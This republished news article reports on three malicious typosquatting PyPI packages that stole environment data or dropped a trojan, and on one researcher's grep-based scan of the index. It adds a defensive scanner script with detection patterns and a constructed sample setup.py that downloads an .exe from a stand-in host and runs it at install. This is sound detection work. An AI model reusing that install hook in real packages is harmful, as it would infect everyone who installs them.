Hard News Hard Hitting News Source Global Political News

Cyber Security

PyPI admins remove three malicious packages after more than 10,000 downloads

The Python Package Index (PyPI) has removed three malware-deploying and data-stealing packages that were collectively downloaded more than 10,000 times.

The trio of malicious packages duped unsuspecting users by typosquatting the names of legitimate packages.

‘Good reputation’

In the case of the two packages that exfiltrated data from compromised systems, the download count was also potentially inflated by the way their authors deceptively burnished the packages’ credibility.

“Both of these packages included their source code URL as an existing popular library, so anyone browsing to the package in PyPI or analyzing how popular the library was would see a large number of GitHub stars and forks – indicating a good reputation,” said Andrew Scott, maintainer of Python security project Ochrona Security, in a Medium blog post.

Uploaded by the same user, the two packages – ‘dpp-client’ and ‘dpp-client1234’ – appeared to target users of Apache Mesos, the open source cluster manager.

They were uploaded to PyPI in February 2021, after which dpp-client alone was downloaded more than 10,000 times, including more than 600 downloads in the month preceding its removal.

Scott thanked the Python security team for removing the packages promptly on December 13, the same day he notified them.

A third, Trojan-dropping package dubbed ‘aws-login0tool’ notched roughly 600 downloads between surfacing on PyPI on December 1 and its removal after PyPI admins were alerted on December 10.

Malicious operandi

All three packages were initially flagged as potentially malicious by a text search for the string ‘import urllib.request’, “since this is commonly used to exfiltrate data or download malicious files”, said Scott.

The data-stealing pair gathered environment variables and file listings, apparently seeking Apache Mesos-related files, and relayed them “to an unknown web service”.

aws-login0tool performed a standard package install before fetching an .exe file “from a nondescript domain” and attempting to execute it; the file was a known Windows trojan.

The package was flagged by multiple text searches of its setup.py, a common location for malicious code in Python packages because arbitrary code placed there is executed at install time, before the package is ever imported, said Scott.

Python probing

The findings emerged from a static analysis of around 200,000 PyPI packages – approaching two-thirds of the total at the time – which Scott downloaded with Bandersnatch, the PyPI mirroring client.

He extracted the packages by creating “a pretty simple Python script to recursively iterate through Bandersnatch’s somewhat complicated folder structure then decompressed and extracted each sdist, egg, or wheel out to a flat directory”.

“Once extracted I ran a number of string and regex searches using grep, then manually reviewed the results,” said Scott.
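The triage described above (a corpus of downloaded sdists, a grep for ‘import urllib.request’ and related strings, and a focus on setup.py as the install-time hook) can be reproduced in a few dozen lines. The following is an added example written for this page, not Andrew Scott’s script or Ochrona Security code; it assumes a flat directory of .tar.gz sdists such as Bandersnatch produces, reads setup.py straight out of each tarball, and uses a small constructed pattern list. The two sample packages it builds in a temporary directory are constructed for the demonstration and are not real PyPI uploads.

```python
"""Static triage of PyPI sdists for install-time network and exec patterns.

Added example: walks a directory of .tar.gz sdists, pulls the top-level
setup.py out of each archive, and reports which heuristic patterns match
and whether the file registers a custom install command. The patterns and
the two sample packages are constructed for this demonstration.
"""
import io
import re
import tarfile
import tempfile
from pathlib import Path

# Heuristic patterns; "urllib_import" is the string the article says flagged
# all three packages. Matches are leads for manual review, not verdicts.
PATTERNS = {
    "urllib_import": re.compile(r"^\s*(?:import|from)\s+urllib(?:\.request)?\b", re.M),
    "remote_fetch": re.compile(r"urlopen\(|urlretrieve\(|requests\.get\("),
    "exec_binary": re.compile(r"\.exe\b|subprocess\.|os\.system\(|os\.startfile\("),
    "env_dump": re.compile(r"os\.environ\b|os\.listdir\(|os\.walk\("),
}

# Subclassing an install command or passing cmdclass= is how setup.py code is
# arranged to run during `pip install`, rather than only at import time.
INSTALL_HOOKS = re.compile(r"class\s+\w+\((?:install|develop|egg_info)\)|cmdclass\s*=")


def scan_source(text):
    """Return {pattern_name: [line_no, ...]} for every pattern that matches."""
    hits = {}
    for name, rx in PATTERNS.items():
        lines = sorted({text.count("\n", 0, m.start()) + 1 for m in rx.finditer(text)})
        if lines:
            hits[name] = lines
    return hits


def scan_sdist(path):
    """Scan the top-level setup.py inside an sdist tarball without unpacking it."""
    with tarfile.open(str(path), "r:*") as tar:
        for member in tar.getmembers():
            parts = Path(member.name).parts
            # sdists unpack to <name>-<version>/setup.py; nested copies are ignored
            if len(parts) == 2 and parts[1] == "setup.py" and member.isfile():
                text = tar.extractfile(member).read().decode("utf-8", "replace")
                return {
                    "member": member.name,
                    "hits": scan_source(text),
                    "install_hook": bool(INSTALL_HOOKS.search(text)),
                }
    return {"member": None, "hits": {}, "install_hook": False}


def scan_mirror(root):
    """Scan every .tar.gz under root; return {filename: result} for files with any hit."""
    flagged = {}
    for p in sorted(Path(root).rglob("*.tar.gz")):
        result = scan_sdist(p)
        if result["hits"]:
            flagged[p.name] = result
    return flagged


# --- constructed sample packages (not real PyPI uploads) --------------------
BENIGN_SETUP = "from setuptools import setup\nsetup(name='benign', version='0.1')\n"
SUSPICIOUS_SETUP = (
    "import os\n"
    "import urllib.request\n"
    "from setuptools import setup\n"
    "from setuptools.command.install import install\n"
    "class PostInstall(install):\n"
    "    def run(self):\n"
    "        install.run(self)\n"
    "        urllib.request.urlretrieve('http://example.invalid/x.exe', 'x.exe')\n"
    "        os.startfile('x.exe')\n"
    "setup(name='suspicious', version='0.1', cmdclass={'install': PostInstall})\n"
)


def build_sdist(directory, name, setup_py):
    """Write a minimal sdist tarball <name>-0.1.tar.gz containing only setup.py."""
    path = Path(directory) / f"{name}-0.1.tar.gz"
    data = setup_py.encode()
    with tarfile.open(str(path), "w:gz") as tar:
        info = tarfile.TarInfo(f"{name}-0.1/setup.py")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return path


def demo():
    """Build the two samples in a temp dir and return the flagged set."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sdist(tmp, "benign", BENIGN_SETUP)
        build_sdist(tmp, "suspicious", SUSPICIOUS_SETUP)
        return scan_mirror(tmp)


if __name__ == "__main__":
    for fname, result in demo().items():
        print(fname, result)
```

Only sdists are handled here because setup.py is the install-time hook: a wheel is a zip archive with no setup.py and nothing in it runs at install, so for wheels the review moves to the package’s own modules (for example __init__.py) and to what executes on first import. A pattern list this short will produce many benign hits across a real mirror, which is why the article’s workflow ends in manual review rather than automated blocking.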


This technique also uncovered a minor vulnerability in an open source package developed by a commercial vendor.

Scott said he intended to update and refine his package analysis and would later publish additional findings.

Source: https://portswigger.net/daily-swig/pypi-admins-remove-three-malicious-packages-after-more-than-10-000-downloads



Copyright © 2023 Hard News Herd Hitting in Your Face News Source | World News | Breaking News | US News | Political News Website by Top Search SEO